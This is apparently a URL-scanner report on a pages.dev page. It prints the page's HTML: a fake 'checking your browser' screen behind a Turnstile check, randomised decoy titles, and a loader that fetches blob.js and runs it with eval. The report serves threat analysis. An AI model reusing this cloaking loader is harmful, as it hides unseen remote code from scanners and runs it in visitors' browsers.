https://s0vdbl.pages.dev/x1jx#

Submitted URL:
https://s0vdbl.pages.dev/x1jx#
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 9 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

NameType
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
$function
jQueryfunction
setRandomTitlefunction
loadAndExecuteAppScriptfunction
onloadTurnstileCallbackfunction
turnstileobject

Console log messages · 1 found

Messages logged to the web console

TypeCategoryLog
errornetwork
URL
https://s0vdbl.pages.dev/favicon.ico
Text
Failed to load resource: the server responded with a status of 404 ()

HTML

The raw HTML body of the page

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <script src="https://cdn.jsdelivr.net/gh/MeSrabon/randomtitle@main/title.js"></script>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title id="initialTitle">Astronomy Facts</title>
    <script src="https://code.jquery.com/jquery-3.7.1.js" integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4=" crossorigin="anonymous"></script>
    <script>
        function setRandomTitle() {
            const randomIndex = Math.floor(Math.random() * titles.length);
            const randomTitle = titles[randomIndex];
            document.title = randomTitle;
        }
        setRandomTitle();
        window.onloadTurnstileCallback = function () {
            try {
                turnstile.render('#example-container', {
                    sitekey: '0x4AAAAAAAfxWJm0wXtphDHJ',
                    callback: function (token) {
                        if (token) {
                            loadAndExecuteAppScript();
                        }
                    },
                    'error-callback': function () {
                        console.error('Error loading Turnstile widget.');
                    },
                });
            } catch (error) {
                console.error('Turnstile failed to initialize:', error);
            }
        };

        function loadAndExecuteAppScript() {
            // Fetch the content of blob.js
            fetch('blob.js')
                .then(response => response.text())
                .then(scriptContent => {
                    // Execute the code using eval
                    try {
                        eval(scriptContent);
                    } catch (error) {
                        console.error('Error executing blob.js:', error);
                    }
                })
                .catch(error => {
                    console.error('Error loading blob.js:', error);
                });
        }
    </script>
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" async="" defer=""></script>
</head>

<body>
    <div style="display:flex;justify-content:center;align-items:center;text-align:center;flex-direction: column;" id="example-container">
        <br>
        <p style="display:flex;justify-content:center;align-items:center;text-align:center;flex-direction: column;font-size: 20px;">
            checking your browser before accessing...</p><br>
    <div><input type="hidden" name="cf-turnstile-response" id="cf-chl-widget-6vldf_response"></div></div>
    <div id="app-content"></div>


</body></html>